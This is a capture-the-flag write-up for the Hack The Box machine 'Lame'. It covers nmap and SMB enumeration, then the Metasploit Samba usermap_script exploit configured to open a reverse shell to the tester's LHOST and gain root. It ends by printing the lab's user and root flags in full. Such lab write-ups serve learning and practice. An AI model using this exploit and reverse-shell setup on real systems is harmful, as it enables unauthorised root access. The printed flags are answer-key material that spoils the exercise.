Lame - Writeup

Lame

Reconnaissance

IP: 10.10.10.3

Starting with the default Nmap scan we see five services running out of which threee seem interesting FTP on port 21, SSH on port 22 and SMB on port 139.

nmap -sV -sC -Pn -p- 10.10.10.3 
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2022-04-19T20:45:35-04:00
|_clock-skew: mean: 2h00m20s, deviation: 2h49m44s, median: 18s

After inspecting the FTP port with the ftp command we find out that it is empty and not really interesting right now. Trying to use default logins with SSH didnt work either so started enumerating the SMB server with SMBClient.

smbclient -L \\\\10.10.10.3\\

Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk      
        IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
        ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))

Trying a few default Administrator passwords didn’t work either so we are stuck with the anonymous login. Inspecting the two shares we might have acces to, tmp and opt, we find out that we don’t have access to opt and that tmp is rather boring with a few files inside that after inspection turned out to be useless.

smbclient  \\\\10.10.10.3\\tmp

Anonymous login successful
smb: \> ls
  .                                   D        0  Wed Apr 20 07:01:49 2022
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  orbit-makis                        DR        0  Wed Apr 20 06:25:31 2022
  .ICE-unix                          DH        0  Tue Apr 19 20:42:07 2022
  vmware-root                        DR        0  Tue Apr 19 20:42:31 2022
  .X11-unix                          DH        0  Tue Apr 19 20:42:32 2022
  gconfd-makis                       DR        0  Wed Apr 20 06:25:31 2022
  zxnf                                N        0  Tue Apr 19 21:09:40 2022
  .X0-lock                           HR       11  Tue Apr 19 20:42:32 2022
  5562.jsvc_up                        R        0  Tue Apr 19 20:43:10 2022
  vgauthsvclog.txt.0                  R     1600  Tue Apr 19 20:42:05 2022

Now I decided an SMB enumeration tool Enum4Linux. It didn’t return anything interesting in particular it did however show various information like version number (even though Nmap already did that) and password requirements.

Full Enum4Linux Output

If you want to see the full output, see here: Lame - Enum4Linux Output

Googling the version number reveals a pretty easy to execute exploit. It is actually pretty simple, all it does is exploiting a command execution vulnerability by using the non-default username map script configuration option. By specifying a username containing shell meta characters, attackers can execute commands. Lucky for us the exploit is available as a module in Metasploit. All we need to do is to set it up and send it out. Don’t forget to set the victims IP address as the RHOST and your IP address as LHOST you can find it with the ip a command under the tun0 interface which is your VPN connection to HTB

msf > use exploit/multi/samba/usermap_script

msf exploit(usermap_script) > set RHOST 10.10.10.3

msf exploit(usermap_script) > set LHOST 10.10.14.11

msf exploit(usermap_script) > exploit

[*] Started reverse TCP handler on 10.10.14.11:4444 
[*] Command shell session 1 opened (10.10.14.11:4444 -> 10.10.10.3:36895 )

whoami    
root

Now all that is left to do is to grab the flag.

cat /root/root.txt
1cab4dfe1accc3198d**************

Since you also need the user flag to complete the box don’t forget to grab it too.

cat /home/makis/user.txt
d7665557380212******************

And we are done!

User Flag

d76655573802122ab78c8cba5d80e2b8

Flag

1cab4dfe1accc3198df46a0798aedb72

Go to Lame - Solution.pdf to see the official write up.